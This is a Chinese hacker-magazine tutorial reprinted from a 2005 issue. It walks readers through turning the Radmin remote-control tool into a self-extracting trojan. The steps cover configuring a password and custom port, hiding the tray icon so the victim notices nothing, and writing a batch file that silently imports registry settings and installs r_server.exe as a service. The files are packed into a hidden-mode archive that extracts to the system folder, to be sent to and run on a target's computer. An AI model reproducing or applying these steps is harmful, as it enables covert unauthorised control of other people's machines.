本文发表在《黑客X档案》2005年第一期,转载时请注意版权问题。
大家好,雪蓓在这先给各位黑友们问个好,天冷啦,各位黑友们要注意身体哦。
今天雪蓓给大家讲讲自己怎么样做一个简易型木马,哦,对了,忘了介绍自己,改打,忽忽^_^雪蓓还是个学生,是个爱好黑客技术的MM,看了黑客X档案大家写了这么多的好文章,有点手痒,就来发表一下自己的拙作,欢迎大家和雪蓓交流:)
现在废话少说,开始正题,今天教大家做一个radmin的自解压木马(这个方法我在网上有个视频语音教程大家也可以去下载www.tty-1.net 里的黑客新手入门第2招)。一些常用的木马大家应该很熟悉,象灰鸽子啦,黑洞等等~~不过这些都是别人做的好的嘛,想不想自己做一个?很诱惑吧,那就跟着雪蓓开始喽·#·¥·!~~
radmin是一个远程控制软件,我们可以用它来远程教学,当然也可以拿来入侵,它不象灰鸽子和黑洞这样的软件会被杀毒软件认为是病毒,不会被杀(好处大家明白了吧~嘿嘿~),不过一点不足之处呢就是不是反弹形的,对动态IP就没用喽,不过每个事物都有2面性嘛。
首先我们要安装radmin,装好以后我们来配置一下。
第1步
先点radmin设置(图1)里的设置口令会出现1个对话框(图2),在里面输入一个8位密码,这个密码就是你以后要连接对方时输入的密码,那个NT安全不要点那是配置radmin让别人连自己的,这和今天的教大家做的木马没多大关系,然后点击确定就可以了,然后回到radmin设置点击选项会出现1个对话框,radmin的默认端口是4899,大家最好改成一个不会和你想控制的电脑的端口冲突的,雪蓓这里改成1984,大家一定要注意,隐藏托盘图标一定要点,要不你控制对方的时候不就被发现啦,如果这样的话那岂不是很凄惨······· :)(图3)点击确定这一步我们就作好喽,回到radmin设置大家快点退出,我们来开始第2步。
第2步
导出我们注册表里刚刚配置的radmin的信息HKEY_LOCAL_MACHINE中的SYSTEM下的radmin(图4)另存为注册表文件,我给大家示范就命名为xb.reg
再新建一个文本文档输入:
regedit /s xb.reg
r_server.exe
r_server.exe /silence /install
一定要注意空格,xb.reg就是我刚才导出的注册表文件,regedit /s xb.reg 的意思就是把xb.reg导如对方的注册表,/silence是以安静模式运行的意思,/install是每次电脑运行时r_server.exe这个 radmin的服务端都会自动运行,保存时保存类型大家选择所有文件,保存为批处理文件也就是bat文件,我命名为xb.bat(这个批处理的内容有几种输入方法,雪蓓认为这种是最简单的,用着也方便)。自解压中有5个文件,我们在radmin的文件夹里可以找到3个:AdmDll.dll, raddrv.dll,r_server加上我们做的xb.reg和xb.bat就是5个啦,齐了,齐了,先压缩成普通的压缩文件,然后雪蓓就带领大家开始我们的自解压制作旅程喽。(自解压不只是在这制作木马,在别的黑客入侵方面也很有用哦)不说废话啦,要不读者就开始打雪蓓了·····开始第3步(不要打雪蓓,我躲,我躲^_^)
第3步
双击打开我们刚才做的压缩文件点击自解压选项,出现一个对话框,然后大家点击那个高级自解压选项,出现对话框,在那个自解压选项在常规里有个解压路径,大家输入%systemroot%\,解压后运行填我们刚才自己做的批处理文件的名字,我这填xb.bat(图5),然后选择模式选中全部隐藏和跳过已存在文件(这样做就是要隐蔽自己,大家加油,快完成啦:))然后点击确定,确定就可以啦,我们的radmin远程控制自解压木马(名字好长哦,是雪蓓起的,呵呵·#!·#!)就做好啦。我们就可以把这个刚做好的自解压文件传到对放的电脑里,然后运行,它会自动解压,自动运行radmin的服务段,你可以用你的 radmin填入IP,在端口一栏改成你开的端口,雪蓓刚才示范的就是1984,可以连接啦。
radmin的好处就是容易操作,速度很快,大家赶快行动吧,还等什么,不过不要搞破坏,嘿嘿~,就说到这啦,雪蓓是网络休闲庄的会员,大家有空来我们家坐坐吧。
[1] [2]
(出处:http://www.sheup.com)
[1] [2]